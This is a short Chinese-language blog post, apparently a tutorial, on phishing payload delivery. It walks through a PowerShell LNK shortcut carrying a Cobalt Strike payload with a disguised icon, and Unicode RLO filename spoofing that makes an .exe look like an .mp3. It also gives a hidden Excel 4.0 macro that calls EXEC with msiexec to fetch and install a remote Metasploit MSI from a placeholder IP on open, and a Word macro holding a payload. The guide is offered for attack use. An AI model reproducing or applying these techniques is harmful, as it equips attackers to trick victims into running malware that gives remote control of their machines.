钓鱼攻击
一种应用较为广泛的一种攻击方式
lnk快捷方式
1、新建一个快捷方式
位置输入C:\Windows\System32\WindowsPowerShell\v1.0\
(powershell的所在位置的文件目录)

\n
后面再加上cs生成的payload

2、取一个方便操作的名字
3、更改图标
右键属性——更改图标——在 %SystemRoot%\System32\shell32.dll 这个位置下可以找到许多的系统图标
依旧选择一个方便操作的

被点击后即可上线
unicode字符伪装
用于伪装exe文件,降低在人眼中的敏感度
例如这有一个 hh.exe

添加一个正常常见的格式后缀如 .mp3
haha.exe.mp3
将后缀反写后复制 3pm.exe
删掉后缀——右键 插入Unicode控制字符——选择RLO——复制3pm.exe



后缀看上去是mp3,其实还是exe格式的文件

诱导点击即可上线
Excel
1、打开excel,右键sheet选择插入宏表

2、在A1输入**=EXEC(“msiexec/q /i http://xxx.xxx.xxx.xxx/name.msi")**,后面为你在msf生成的payload
A2输入**=HALT()**
选择整个A列,将头名改为 Aotu_open,回车保存

3、最后右键将宏隐藏,保存为启用宏的文件

2、创建一个宏

3、在ThisDocument中复制cs生成的payload


4、最后保存为启用宏的文件
钓鱼攻击
http://example.com/2023/12/03/钓鱼/